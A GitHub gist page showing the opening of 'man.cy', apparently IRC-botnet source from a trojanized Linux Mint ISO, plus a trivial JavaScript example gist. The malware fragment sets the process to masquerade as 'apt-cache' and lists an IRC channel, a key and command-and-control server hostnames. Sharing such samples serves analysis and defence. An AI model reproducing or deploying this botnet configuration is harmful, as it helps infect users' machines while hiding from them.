Skip to content

Instantly share code, notes, and snippets.

View amtux's full-sized avatar
🌥️
cloud is lit

Amandeep Singh amtux

🌥️
cloud is lit
View GitHub Profile
@amtux
amtux / man.cy
Created February 21, 2016 13:47 — forked from kurobeats/man.cy
man.cy from malicious Linux Mint iso
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
"updates.absentvodka.com",
"updates.mintylinux.com",
"eggstrawdinarry.mylittlerepo.com",
@amtux
amtux / 0_reuse_code.js
Created February 12, 2016 15:31
Here are some things you can do with Gists in GistBox.
// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console